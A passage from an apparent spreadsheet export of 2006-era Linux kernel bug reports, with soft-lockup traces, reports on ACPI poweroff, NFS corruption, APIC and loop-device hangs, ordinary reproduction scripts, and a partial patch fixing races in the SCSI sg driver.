BUG: soft lockup detected on CPU#0! Pid: 24, comm: kblockd/0 EIP: 0060:[&lt;c0305219&gt;] CPU: 0 EIP is at scsi_request_fn+0x4d/0x2e2 EFLAGS: 00000246 Not tainted (2.6.16.26-pgcom-smp #1) EAX: c357f194 EBX: 00000000 ECX: f79ccd90 EDX: 00000001 ESI: c357f000 EDI: f7d59bb0 EBP: c35fc000 DS: 007b ES: 007b CR0: 8005003b CR2: a8ea7000 CR3: 37f779a0 CR4: 000006f0 [&lt;c01167c5&gt;] __wake_up+0x40/0x56 [&lt;c028a87c&gt;] cfq_kick_queue+0x5a/0xaa [&lt;c012b15f&gt;] run_workqueue+0x76/0xea [&lt;c028a822&gt;] cfq_kick_queue+0x0/0xaa [&lt;c012b315&gt;] worker_thread+0x142/0x164 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c012b1d3&gt;] worker_thread+0x0/0x164 [&lt;c012e7f1&gt;] kthread+0xb7/0xbd [&lt;c012e73a&gt;] kthread+0x0/0xbd [&lt;c0101149&gt;] kernel_thread_helper+0x5/0xb BUG: soft lockup detected on CPU#0! Pid: 24, comm: kblockd/0 EIP: 0060:[&lt;c0305219&gt;] CPU: 0 EIP is at scsi_request_fn+0x4d/0x2e2 EFLAGS: 00000246 Not tainted (2.6.16.26-pgcom-smp #1) EAX: c357f194 EBX: 00000000 ECX: f7d5caf0 EDX: 00000001 ESI: c357f000 EDI: f7d59bb0 EBP: c35fc000 DS: 007b ES: 007b CR0: 8005003b CR2: b4a58000 CR3: 37f778e0 CR4: 000006f0 [&lt;c01167c5&gt;] __wake_up+0x40/0x56 [&lt;c028a87c&gt;] cfq_kick_queue+0x5a/0xaa [&lt;c012b15f&gt;] run_workqueue+0x76/0xea [&lt;c028a822&gt;] cfq_kick_queue+0x0/0xaa [&lt;c012b315&gt;] worker_thread+0x142/0x164 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c012b1d3&gt;] worker_thread+0x0/0x164 [&lt;c012e7f1&gt;] kthread+0xb7/0xbd [&lt;c012e73a&gt;] kthread+0x0/0xbd [&lt;c0101149&gt;] kernel_thread_helper+0x5/0xb BUG: soft lockup detected on CPU#0! Pid: 24, comm: kblockd/0 EIP: 0060:[&lt;c0305219&gt;] CPU: 0 EIP is at scsi_request_fn+0x4d/0x2e2 EFLAGS: 00000246 Not tainted (2.6.16.26-pgcom-smp #1) EAX: c357f194 EBX: 00000000 ECX: f7c10c28 EDX: 00000001 ESI: c357f000 EDI: f7d59bb0 EBP: c35fc000 DS: 007b ES: 007b CR0: 8005003b CR2: a7e28000 CR3: 37f77860 CR4: 000006f0 [&lt;c01167c5&gt;] __wake_up+0x40/0x56 [&lt;c028a87c&gt;] cfq_kick_queue+0x5a/0xaa [&lt;c012b15f&gt;] run_workqueue+0x76/0xea [&lt;c028a822&gt;] cfq_kick_queue+0x0/0xaa [&lt;c012b315&gt;] worker_thread+0x142/0x164 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c012b1d3&gt;] worker_thread+0x0/0x164 [&lt;c012e7f1&gt;] kthread+0xb7/0xbd [&lt;c012e73a&gt;] kthread+0x0/0xbd [&lt;c0101149&gt;] kernel_thread_helper+0x5/0xb BUG: soft lockup detected on CPU#0! Pid: 24, comm: kblockd/0 EIP: 0060:[&lt;c0305219&gt;] CPU: 0 EIP is at scsi_request_fn+0x4d/0x2e2 EFLAGS: 00000246 Not tainted (2.6.16.26-pgcom-smp #1) EAX: c357f194 EBX: 00000000 ECX: f7c10c28 EDX: 00000001 ESI: c357f000 EDI: f7d59bb0 EBP: c35fc000 DS: 007b ES: 007b CR0: 8005003b CR2: b54f9000 CR3: 37f77940 CR4: 000006f0 [&lt;c01167c5&gt;] __wake_up+0x40/0x56 [&lt;c028a87c&gt;] cfq_kick_queue+0x5a/0xaa [&lt;c012b15f&gt;] run_workqueue+0x76/0xea [&lt;c028a822&gt;] cfq_kick_queue+0x0/0xaa [&lt;c012b315&gt;] worker_thread+0x142/0x164 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c012b1d3&gt;] worker_thread+0x0/0x164 [&lt;c012e7f1&gt;] kthread+0xb7/0xbd [&lt;c012e73a&gt;] kthread+0x0/0xbd [&lt;c0101149&gt;] kernel_thread_helper+0x5/0xb BUG: soft lockup detected on CPU#0! Pid: 24, comm: kblockd/0 EIP: 0060:[&lt;c039af8f&gt;] CPU: 0 EIP is at _spin_unlock_irqrestore+0x5/0x6 EFLAGS: 00000296 Not tainted (2.6.16.26-pgcom-smp #1) EAX: f7d59cac EBX: f7c10c98 ECX: f7c10c28 EDX: 00000296 ESI: f7c10c9c EDI: c367ff40 EBP: f7d59bb0 DS: 007b ES: 007b CR0: 8005003b CR2: b4e99000 CR3: 37f779a0 CR4: 000006f0 [&lt;c012b15f&gt;] run_workqueue+0x76/0xea [&lt;c028a822&gt;] cfq_kick_queue+0x0/0xaa [&lt;c012b315&gt;] worker_thread+0x142/0x164 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c012b1d3&gt;] worker_thread+0x0/0x164 [&lt;c012e7f1&gt;] kthread+0xb7/0xbd [&lt;c012e73a&gt;] kthread+0x0/0xbd [&lt;c0101149&gt;] kernel_thread_helper+0x5/0xb BUG: soft lockup detected on CPU#0! Pid: 24, comm: kblockd/0 EIP: 0060:[&lt;c0305219&gt;] CPU: 0 EIP is at scsi_request_fn+0x4d/0x2e2 EFLAGS: 00000246 Not tainted (2.6.16.26-pgcom-smp #1) EAX: c357f194 EBX: 00000000 ECX: f7d5cd30 EDX: 00000001 ESI: c357f000 EDI: f7d59bb0 EBP: c35fc000 DS: 007b ES: 007b CR0: 8005003b CR2: b2134000 CR3: 37f778a0 CR4: 000006f0 [&lt;c01167c5&gt;] __wake_up+0x40/0x56 [&lt;c028a87c&gt;] cfq_kick_queue+0x5a/0xaa [&lt;c012b15f&gt;] run_workqueue+0x76/0xea [&lt;c028a822&gt;] cfq_kick_queue+0x0/0xaa [&lt;c012b315&gt;] worker_thread+0x142/0x164 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c012b1d3&gt;] worker_thread+0x0/0x164 [&lt;c012e7f1&gt;] kthread+0xb7/0xbd [&lt;c012e73a&gt;] kthread+0x0/0xbd [&lt;c0101149&gt;] kernel_thread_helper+0x5/0xb BUG: soft lockup detected on CPU#0! Pid: 24, comm: kblockd/0 EIP: 0060:[&lt;c0305219&gt;] CPU: 0 EIP is at scsi_request_fn+0x4d/0x2e2 EFLAGS: 00000246 Not tainted (2.6.16.26-pgcom-smp #1) EAX: c357f194 EBX: 00000000 ECX: f7c10c28 EDX: 00000001 ESI: c357f000 EDI: f7d59bb0 EBP: c35fc000 DS: 007b ES: 007b CR0: 8005003b CR2: b2134000 CR3: 37f778a0 CR4: 000006f0 [&lt;c01167c5&gt;] __wake_up+0x40/0x56 [&lt;c028a87c&gt;] cfq_kick_queue+0x5a/0xaa [&lt;c012b15f&gt;] run_workqueue+0x76/0xea [&lt;c028a822&gt;] cfq_kick_queue+0x0/0xaa [&lt;c012b315&gt;] worker_thread+0x142/0x164 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c012b1d3&gt;] worker_thread+0x0/0x164 [&lt;c012e7f1&gt;] kthread+0xb7/0xbd [&lt;c012e73a&gt;] kthread+0x0/0xbd [&lt;c0101149&gt;] kernel_thread_helper+0x5/0xb BUG: soft lockup detected on CPU#0! Pid: 24, comm: kblockd/0 EIP: 0060:[&lt;c039af8f&gt;] CPU: 0 EIP is at _spin_unlock_irqrestore+0x5/0x6 EFLAGS: 00000282 Not tainted (2.6.16.26-pgcom-smp #1) EAX: c367ff40 EBX: f7c10c98 ECX: 00000001 EDX: 00000282 ESI: f7c10c9c EDI: c367ff40 EBP: f7d59bb0 DS: 007b ES: 007b CR0: 8005003b CR2: ab034000 CR3: 37f778c0 CR4: 000006f0 [&lt;c012b14d&gt;] run_workqueue+0x64/0xea [&lt;c028a822&gt;] cfq_kick_queue+0x0/0xaa [&lt;c012b315&gt;] worker_thread+0x142/0x164 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c012b1d3&gt;] worker_thread+0x0/0x164 [&lt;c012e7f1&gt;] kthread+0xb7/0xbd [&lt;c012e73a&gt;] kthread+0x0/0xbd [&lt;c0101149&gt;] kernel_thread_helper+0x5/0xb BUG: soft lockup detected on CPU#0! Pid: 24, comm: kblockd/0 EIP: 0060:[&lt;c0305219&gt;] CPU: 0 EIP is at scsi_request_fn+0x4d/0x2e2 EFLAGS: 00000246 Not tainted (2.6.16.26-pgcom-smp #1) EAX: c357f194 EBX: 00000000 ECX: f7c10c28 EDX: 00000001 ESI: c357f000 EDI: f7d59bb0 EBP: c35fc000 DS: 007b ES: 007b CR0: 8005003b CR2: b6c13000 CR3: 37f77de0 CR4: 000006f0 [&lt;c01167c5&gt;] __wake_up+0x40/0x56 [&lt;c028a87c&gt;] cfq_kick_queue+0x5a/0xaa [&lt;c012b15f&gt;] run_workqueue+0x76/0xea [&lt;c028a822&gt;] cfq_kick_queue+0x0/0xaa [&lt;c012b315&gt;] worker_thread+0x142/0x164 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c012b1d3&gt;] worker_thread+0x0/0x164 [&lt;c012e7f1&gt;] kthread+0xb7/0xbd [&lt;c012e73a&gt;] kthread+0x0/0xbd [&lt;c0101149&gt;] kernel_thread_helper+0x5/0xb BUG: soft lockup detected on CPU#0! Pid: 24, comm: kblockd/0 EIP: 0060:[&lt;c0305219&gt;] CPU: 0 EIP is at scsi_request_fn+0x4d/0x2e2 EFLAGS: 00000246 Not tainted (2.6.16.26-pgcom-smp #1) EAX: c357f194 EBX: 00000000 ECX: f7c10c28 EDX: 00000001 ESI: c357f000 EDI: f7d59bb0 EBP: c35fc000 DS: 007b ES: 007b CR0: 8005003b CR2: ada7b000 CR3: 37f778c0 CR4: 000006f0 [&lt;c01167c5&gt;] __wake_up+0x40/0x56 [&lt;c028a87c&gt;] cfq_kick_queue+0x5a/0xaa [&lt;c012b15f&gt;] run_workqueue+0x76/0xea [&lt;c028a822&gt;] cfq_kick_queue+0x0/0xaa [&lt;c012b315&gt;] worker_thread+0x142/0x164 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c012b1d3&gt;] worker_thread+0x0/0x164 [&lt;c012e7f1&gt;] kthread+0xb7/0xbd [&lt;c012e73a&gt;] kthread+0x0/0xbd [&lt;c0101149&gt;] kernel_thread_helper+0x5/0xb BUG: soft lockup detected on CPU#0! Pid: 24, comm: kblockd/0 EIP: 0060:[&lt;c039af8f&gt;] CPU: 0 EIP is at _spin_unlock_irqrestore+0x5/0x6 EFLAGS: 00000296 Not tainted (2.6.16.26-pgcom-smp #1) EAX: f7d59cac EBX: f7c10c98 ECX: f79ccd90 EDX: 00000296 ESI: f7c10c9c EDI: c367ff40 EBP: f7d59bb0 DS: 007b ES: 007b CR0: 8005003b CR2: b49f5000 CR3: 37f778e0 CR4: 000006f0 [&lt;c012b15f&gt;] run_workqueue+0x76/0xea [&lt;c028a822&gt;] cfq_kick_queue+0x0/0xaa [&lt;c012b315&gt;] worker_thread+0x142/0x164 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c012b1d3&gt;] worker_thread+0x0/0x164 [&lt;c012e7f1&gt;] kthread+0xb7/0xbd [&lt;c012e73a&gt;] kthread+0x0/0xbd [&lt;c0101149&gt;] kernel_thread_helper+0x5/0xb BUG: soft lockup detected on CPU#0! Pid: 24, comm: kblockd/0 EIP: 0060:[&lt;c0305219&gt;] CPU: 0 EIP is at scsi_request_fn+0x4d/0x2e2 EFLAGS: 00000246 Not tainted (2.6.16.26-pgcom-smp #1) EAX: c357f194 EBX: 00000000 ECX: f79ccd90 EDX: 00000001 ESI: c357f000 EDI: f7d59bb0 EBP: c35fc000 DS: 007b ES: 007b CR0: 8005003b CR2: b4617000 CR3: 004a5000 CR4: 000006f0 [&lt;c01167c5&gt;] __wake_up+0x40/0x56 [&lt;c028a87c&gt;] cfq_kick_queue+0x5a/0xaa [&lt;c012b15f&gt;] run_workqueue+0x76/0xea [&lt;c028a822&gt;] cfq_kick_queue+0x0/0xaa [&lt;c012b315&gt;] worker_thread+0x142/0x164 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c012b1d3&gt;] worker_thread+0x0/0x164 [&lt;c012e7f1&gt;] kthread+0xb7/0xbd [&lt;c012e73a&gt;] kthread+0x0/0xbd [&lt;c0101149&gt;] kernel_thread_helper+0x5/0xb BUG: soft lockup detected on CPU#0! Pid: 24, comm: kblockd/0 EIP: 0060:[&lt;c0305219&gt;] CPU: 0 EIP is at scsi_request_fn+0x4d/0x2e2 EFLAGS: 00000246 Not tainted (2.6.16.26-pgcom-smp #1) EAX: c357f194 EBX: 00000000 ECX: f7c10c28 EDX: 00000001 ESI: c357f000 EDI: f7d59bb0 EBP: c35fc000 DS: 007b ES: 007b CR0: 8005003b CR2: a8276000 CR3: 37f77900 CR4: 000006f0 [&lt;c01167c5&gt;] __wake_up+0x40/0x56 [&lt;c028a87c&gt;] cfq_kick_queue+0x5a/0xaa [&lt;c012b15f&gt;] run_workqueue+0x76/0xea [&lt;c028a822&gt;] cfq_kick_queue+0x0/0xaa [&lt;c012b315&gt;] worker_thread+0x142/0x164 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c012b1d3&gt;] worker_thread+0x0/0x164 [&lt;c012e7f1&gt;] kthread+0xb7/0xbd [&lt;c012e73a&gt;] kthread+0x0/0xbd [&lt;c0101149&gt;] kernel_thread_helper+0x5/0xb BUG: soft lockup detected on CPU#0! Pid: 24, comm: kblockd/0 EIP: 0060:[&lt;c0305219&gt;] CPU: 0 EIP is at scsi_request_fn+0x4d/0x2e2 EFLAGS: 00000246 Not tainted (2.6.16.26-pgcom-smp #1) EAX: c357f194 EBX: 00000000 ECX: f79ccd90 EDX: 00000001 ESI: c357f000 EDI: f7d59bb0 EBP: c35fc000 DS: 007b ES: 007b CR0: 8005003b CR2: add3e000 CR3: 37f776a0 CR4: 000006f0 [&lt;c01167c5&gt;] __wake_up+0x40/0x56 [&lt;c028a87c&gt;] cfq_kick_queue+0x5a/0xaa [&lt;c012b15f&gt;] run_workqueue+0x76/0xea [&lt;c028a822&gt;] cfq_kick_queue+0x0/0xaa [&lt;c012b315&gt;] worker_thread+0x142/0x164 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c012b1d3&gt;] worker_thread+0x0/0x164 [&lt;c012e7f1&gt;] kthread+0xb7/0xbd [&lt;c012e73a&gt;] kthread+0x0/0xbd [&lt;c0101149&gt;] kernel_thread_helper+0x5/0xb BUG: soft lockup detected on CPU#0! Pid: 24, comm: kblockd/0 EIP: 0060:[&lt;c014233c&gt;] CPU: 0 EIP is at mempool_free+0x1a/0x9a EFLAGS: 00000282 Not tainted (2.6.16.26-pgcom-smp #1) EAX: f7748f80 EBX: f7748f80 ECX: 0000000c EDX: c352f240 ESI: 00000000 EDI: e9307784 EBP: 00000000 DS: 007b ES: 007b CR0: 8005003b CR2: afe18000 CR3: 37f77900 CR4: 000006f0 [&lt;f8dd9290&gt;] dec_pending+0x4e/0x84 [dm_mod] [&lt;f8dd936d&gt;] clone_endio+0xa7/0xb7 [dm_mod] [&lt;c027d5b5&gt;] elv_next_request+0x45/0x15e [&lt;c016463f&gt;] bio_endio+0x59/0x7e [&lt;c0281d1a&gt;] __end_that_request_first+0xe0/0x31f [&lt;c0280060&gt;] blk_run_queue+0x45/0x7e [&lt;c030459d&gt;] scsi_end_request+0x3b/0xf3 [&lt;c03048cc&gt;] scsi_io_completion+0x149/0x493 [&lt;c03048cc&gt;] scsi_io_completion+0x149/0x493 [&lt;c031d537&gt;] sd_rw_intr+0xb8/0x266 [&lt;c030429d&gt;] scsi_device_unbusy+0x45/0x7c [&lt;c02ffc77&gt;] scsi_finish_command+0x82/0xa2 [&lt;c030515c&gt;] scsi_softirq_done+0x7e/0xee [&lt;c010fda6&gt;] end_level_ioapic_vector+0x3f/0xbd [&lt;c0281fd8&gt;] blk_done_softirq+0x70/0x7a [&lt;c0120733&gt;] __do_softirq+0xbf/0xd5 [&lt;c012077b&gt;] do_softirq+0x32/0x34 [&lt;c010530a&gt;] do_IRQ+0x1e/0x24 [&lt;c010370e&gt;] common_interrupt+0x1a/0x20 [&lt;c028007b&gt;] blk_run_queue+0x60/0x7e [&lt;c0305219&gt;] scsi_request_fn+0x4d/0x2e2 [&lt;c01167c5&gt;] __wake_up+0x40/0x56 [&lt;c028a87c&gt;] cfq_kick_queue+0x5a/0xaa [&lt;c012b15f&gt;] run_workqueue+0x76/0xea [&lt;c028a822&gt;] cfq_kick_queue+0x0/0xaa [&lt;c012b315&gt;] worker_thread+0x142/0x164 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c012b1d3&gt;] worker_thread+0x0/0x164 [&lt;c012e7f1&gt;] kthread+0xb7/0xbd [&lt;c012e73a&gt;] kthread+0x0/0xbd [&lt;c0101149&gt;] kernel_thread_helper+0x5/0xb BUG: soft lockup detected on CPU#0! Pid: 24, comm: kblockd/0 EIP: 0060:[&lt;c028d7e0&gt;] CPU: 0 EIP is at kref_put+0x22/0x9e EFLAGS: 00000202 Not tainted (2.6.16.26-pgcom-smp #1) EAX: c357f224 EBX: c357f224 ECX: f7c10c28 EDX: 00000001 ESI: c028d016 EDI: f7d59bb0 EBP: c35fc000 DS: 007b ES: 007b CR0: 8005003b CR2: afe18000 CR3: 37f77900 CR4: 000006f0 [&lt;c027d5b5&gt;] elv_next_request+0x45/0x15e [&lt;c028d03e&gt;] kobject_put+0x1e/0x22 [&lt;c028d016&gt;] kobject_release+0x0/0xa [&lt;c0305221&gt;] scsi_request_fn+0x55/0x2e2 [&lt;c01167c5&gt;] __wake_up+0x40/0x56 [&lt;c028a87c&gt;] cfq_kick_queue+0x5a/0xaa [&lt;c012b15f&gt;] run_workqueue+0x76/0xea [&lt;c028a822&gt;] cfq_kick_queue+0x0/0xaa [&lt;c012b315&gt;] worker_thread+0x142/0x164 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c012b1d3&gt;] worker_thread+0x0/0x164 [&lt;c012e7f1&gt;] kthread+0xb7/0xbd [&lt;c012e73a&gt;] kthread+0x0/0xbd [&lt;c0101149&gt;] kernel_thread_helper+0x5/0xb Steps to reproduce: cd /backup; stress -d 2 -c 4 -m 4 -i 4 Then wait.</t>
  </si>
  <si>
    <t>poweroff doesn't - A7S333</t>
  </si>
  <si>
    <t>2.6.13 and high</t>
  </si>
  <si>
    <t>2006-07-18 09:35 UTC</t>
  </si>
  <si>
    <t>Icoslau</t>
  </si>
  <si>
    <t>2008-06-13 20:18 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.12 Distribution: SuSE Linux 10.0 and 10.1 Hardware Environment: ASUS A7S333 - Athlon XP 2400+ - 512DDR - Fireball 40Gb - Pinnacle PCTV, Creative SB Live - Realtek 8139 - LG 52x - Samsung DVD/RW TSH552U Software Environment: KDE from distro Problem Description: In the kernel 2.6.12 (Mandriva 2006) the ACPI is loaded correctly and my system after a halt process has power off correctly, not require action on the button of case. In the SuSE 10.0 and higher, i think the kernel 2.6.13 or higher, the ACPI show some errors and after halt the system stay powered, only power off with a button case. I try many different suggestions on the web, DSDT, use APM instead of ACPI (in APM the machine power off correctly, but all times after one hour the system hangs), kernel compiling with or not ACPI (of course the same with APM) but the results are the same, with ACPI and kernel &gt; 2.6.12 the machine stay powered after halt, and with APM the machihe hangs.</t>
  </si>
  <si>
    <t>Corruped writes on nfs share</t>
  </si>
  <si>
    <t>2.6.16, 2.6.17</t>
  </si>
  <si>
    <t>2006-07-18 10:05 UTC</t>
  </si>
  <si>
    <t>Razvan Gavril</t>
  </si>
  <si>
    <t>2006-08-28 05:28 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: N/A Distribution: Debian (Custom) I have a nfs server and some diskless computers that that have their root mounted via nfs from the server. In certain situations the diskless computers fail to write correctly to their nfs mounted filesystem (some files get corrupted). Looking into the nfs server's dmesg, i see this messages: RPC: bad TCP reclen 0x5e9c5bec (non-terminal) RPC: bad TCP reclen 0x29db3277 (large) RPC: bad TCP reclen 0x698f6ccf (large) RPC: bad TCP reclen 0x336160a9 (large) RPC: bad TCP reclen 0x773ffdff (large) RPC: bad TCP reclen 0x231b8d5c (non-terminal) RPC: bad TCP reclen 0x39902af4 (large) RPC: bad TCP reclen 0x6048d9cc (non-terminal) RPC: bad TCP reclen 0x212f7e14 (non-terminal) This errors start to happen when upgrading to 2.6.16 from 2.6.15 but the problem is still present in 2.6.17 kernel. For now i tested like this: Client - Server - State ------------------------ 2.6.15 - 2.6.15 - Works 2.6.15 - 2.6.16 - Errors 2.6.16 - 2.6.16 - Errors 2.6.16 - 2.6.17 - Errors 2.6.17 - 2.6.17 - Errors From the looks of it the problem seems to be related to the nfs server implementation from the kernels newer that 2.6.15. Those corrupted writes on client + dmesg messages on the server are easy to duplicate when using Debian on the client computers and running this script in parallel on more that 1 client: while /bin/true ;do apt-get update err=$? [[ $err != 0 ]] &amp;&amp; echo "Exiting $err" &amp;&amp; exit $err # you can replace gdb with any other package apt-get -y install gdb err=$? [[ $err != 0 ]] &amp;&amp; echo "Exiting $err" &amp;&amp; exit $err apt-get -y remove gdb err=$? [[ $err != 0 ]] &amp;&amp; echo "Exiting $err" &amp;&amp; exit $err sleep $(( $RANDOM % 3 )) done After a couple o minutes (1-5min) apt should give a segmentation fault because one of its state files got corrupted (/lib/dpkg/status or other). FYI, the clients DON'T have any common files/dirs so a race condition in apt can't be the cause. It's easy to see that for every apt segfault on the client you'll have a rpc error message on the server. I also tried with some different script to reproduce the problem, for example to copy a lot of files(small, big ..) from a nfs share to another but the md5sum reported that every time the copying was happening without corruption so using apt is the only solution to reproduce the bug for now. I'm here if you need any other info related to this problem.</t>
  </si>
  <si>
    <t>boot hang unless "noapic" - invalid _PRT entries - MSI MS-6390-L</t>
  </si>
  <si>
    <t>2.6.4 and above</t>
  </si>
  <si>
    <t>2006-07-18 10:39 UTC</t>
  </si>
  <si>
    <t>Eugenia Loli-Queru</t>
  </si>
  <si>
    <t>2008-08-15 09:29 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17 Distribution: SuSE 10.1 Hardware Environment: Athlon XP 1.6 GHz, MSI motherboard (MS-6390-L v1.0) which features the VIA KM266 chipset. The motherboard features an onboard RTL8139 network card, AC97/8233A VIA sound and south bridge, and also an integrated S3 Savage4-PRO+ 266DDR. 512 MB RAM. Software Environment: SuSE/Ubuntu/Arch Linux. I think that only Fedora works, but not sure, it has been a while since I tried Fedora in this machine. Problem Description: The kernel will boot only to safe mode and won't mount any partitions (suse). With other distros it will boot, but no pci hardware will work (ubuntu, Arch). All these problems are going away only if you pass the "nolapic" kernel parameter. But I believe that the user experience is not good if the user has to pass kernel parameters, IMHO this is something that must be fixed. Steps to reproduce: Just try to install a recent distro on this machine. boot message of the suse dvd with apic=debug https://bugzilla.novell.com/attachment.cgi?id=92035&amp;action=view Dmesg of suse https://bugzilla.novell.com/attachment.cgi?id=92036&amp;action=view https://bugzilla.novell.com/attachment.cgi?id=93759&amp;action=view acpi dump logs tarball: acpi.txt is from acpidmp, and acpidump.txt us from acpidump Novell won't look at the problem, so you are my only hope. This is probably a BIOS bug, but the point is that Windows works (including Vista), BeOS and BSD works, and even kernel 2.4 works perfectly. So I think that this problem should be fixed as kernel 2.6 is the only one that misbehaves, and also because older hardware is what to expect in most Enterprise businesses today. Thanks.</t>
  </si>
  <si>
    <t>mounting loop device hangs mount in kernel</t>
  </si>
  <si>
    <t>2006-07-19 04:10 UTC</t>
  </si>
  <si>
    <t>Tomas Pospisek</t>
  </si>
  <si>
    <t>2008-09-22 16:49 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.15.6 Distribution: Debian stable Hardware Environment: i386 Software Environment: Problem Description: Executing the following script reproducibly hangs the mount process inside the kernel. This is what I get as a result: Jul 19 07:16:40 localhost kernel: FAT: unable to read boot sector Jul 19 07:16:40 localhost kernel: ------------[ cut here ]------------ Jul 19 07:16:40 localhost kernel: kernel BUG at &lt;bad filename&gt;:31619! Jul 19 07:16:40 localhost kernel: invalid opcode: 0000 [#1] Jul 19 07:16:40 localhost kernel: PREEMPT Jul 19 07:16:40 localhost kernel: Modules linked in: vfat fat i915 drm tsdev mousedev pcspkr piix intel_agp agpgar t psmouse genrtc Jul 19 07:16:40 localhost kernel: CPU: 0 Jul 19 07:16:40 localhost kernel: EIP: 0060:[loop_thread+202/277] Not tainted VLI Jul 19 07:16:40 localhost kernel: EFLAGS: 00010246 (2.6.17.6 #1) Jul 19 07:16:40 localhost kernel: EIP is at loop_thread+0xca/0x115 Jul 19 07:16:40 localhost kernel: eax: 00000000 ebx: 00000000 ecx: ddc58000 edx: 00000001 Jul 19 07:16:40 localhost kernel: esi: ddc58000 edi: 00000000 ebp: 00000000 esp: d79e1fdc Jul 19 07:16:40 localhost kernel: ds: 007b es: 007b ss: 0068 Jul 19 07:16:40 localhost kernel: Process loop0 (pid: 4101, threadinfo=d79e0000 task=daf20570) Jul 19 07:16:40 localhost kernel: Stack: c022edfc 00000000 00000000 c0101329 ddc58000 00000000 00000000 00000000 Jul 19 07:16:40 localhost kernel: 00000000 Jul 19 07:16:40 localhost kernel: Call Trace: Jul 19 07:16:40 localhost kernel: &lt;c022edfc&gt; loop_thread+0x0/0x115 &lt;c0101329&gt; kernel_thread_helper+0x5/0xb Jul 19 07:16:40 localhost kernel: Code: c3 4f 89 be 1c 01 00 00 fb b8 01 00 00 00 e8 05 4d ee ff 59 b8 00 e0 ff ff 21 e0 8b 40 08 a8 08 74 05 e8 05 f0 11 00 85 db 75 02 &lt;0f&gt; 0b 83 7b 0c 00 75 14 ff 73 3c 56 e8 a5 00 00 00 58 5a 53 e8 Jul 19 07:16:40 localhost kernel: EIP: [loop_thread+202/277] loop_thread+0xca/0x115 SS:ESP 0068:d79e1fdc Steps to reproduce: execute the following script with the provided image (it's an empty FAT image): losetup /dev/loop5 trash_image.lo tmpdir=`mktemp -d /tmp/d.XXXXXX` mount /dev/loop5 $tmpdir umount /dev/loop5 rm -r $tmpdir losetup -d /dev/loop5 tmpdir=`mktemp -d /tmp/d.XXXXXX` mount /dev/loop5 $tmpdir rmdir $tmpdir losetup /dev/loop5 trash_image.lo tmpdir=`mktemp -d /tmp/d.XXXXXX` mount /dev/loop5 $tmpdir</t>
  </si>
  <si>
    <t>Crash with Nat consumption in sg_add</t>
  </si>
  <si>
    <t>2006-07-19 08:24 UTC</t>
  </si>
  <si>
    <t>Philippe Bauwens</t>
  </si>
  <si>
    <t>2008-03-26 08:25 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution:BAS4 Hardware Environment:IA64/Fame Software Environment: Problem Description:When class_simple_device_add returns an error (class_device_create in 2.6.17) the error is later used by class_set_devdata as a pointer and causes the crash. In our case the error was an EEXIST and this is because of 3 other bugs in the same module. 1) the count of sg devices, sg_nr_dev does not match the number of available entries in sg_dev_arr because of a coding problem in sg_remove. under some conditions, the count is decremented when the entry is not cleared. 2) if no available entry is found in sg_dev_arr, the value used for k will be sg_dev_max and will cause to overflow the sg_dev_arr table. (and will also cause the EEXIST on the very next pass). Of course this will only happend if sg_nr_dev does not reflect the table. 3) there is a possible race condition in the code which grows the sg_dev_arr table because the lock is released. This could result in copying the wrong number of device and setting it to a wrong value. Steps to reproduce:have a high IO activity to a fairly large number of sg devices, pull and then reconnect the fiber cable to couple hunderd LUNs. here is a patch I have succesfully tested. (the patch is against 2.6.17.2 and the one I've tested was against 2.6.12.6, I have never tested the 2.6.17.2 version) --- linux-2.6.17.2.old/drivers/scsi/sg.c 2006-07-19 06:29:39.973691304 - 0700 +++ linux-2.6.17.2/drivers/scsi/sg.c 2006-07-19 07:08:11.425931457 -0700 @@ -1341,23 +1341,33 @@ write_lock_irqsave(&amp;sg_dev_arr_lock, iflags); if (unlikely(sg_nr_dev &gt;= sg_dev_max)) { /* try to resize */ Sg_device **tmp_da; - int tmp_dev_max = sg_nr_dev + SG_DEV_ARR_LUMP; - write_unlock_irqrestore(&amp;sg_dev_arr_lock, iflags); - - tmp_da = kzalloc(tmp_dev_max * sizeof(Sg_device *), GFP_KERNEL); - if (unlikely(!tmp_da)) - goto expand_failed; - - write_lock_irqsave(&amp;sg_dev_arr_lock, iflags); - memcpy(tmp_da, sg_dev_arr, sg_dev_max * sizeof(Sg_device *)); - old_sg_dev_arr = sg_dev_arr; - sg_dev_arr = tmp_da; - sg_dev_max = tmp_dev_max; 